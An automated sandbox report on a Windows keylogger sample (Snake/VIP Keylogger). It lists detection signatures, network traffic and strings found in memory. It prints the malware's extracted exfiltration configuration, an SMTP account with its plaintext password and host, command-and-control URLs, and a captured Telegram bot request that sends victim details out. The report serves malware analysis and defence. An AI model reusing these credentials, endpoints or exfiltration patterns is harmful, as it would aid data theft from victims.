Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Analysis ID: 1519297
MD5: 42f2ce52a57e0d72eac297a532354e42
SHA1: 7f2f1ef38365147865f1cec2c1d0ad62cdc6f7d0
SHA256: 516ffdb4ef149292e235bea6b676674d973e52c3382fdd3c40f85245f9e564ba
Tags: exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Avira: detected
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe ReversingLabs: Detection: 28%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49745 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4x nop then jmp 00ECF8E9h 4_2_00ECF630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4x nop then jmp 00ECFD41h 4_2_00ECFA88

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49745 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 08:33:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1737431170.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1741165267.00000000056D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmE
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1741882938.0000000005712000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003D14000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 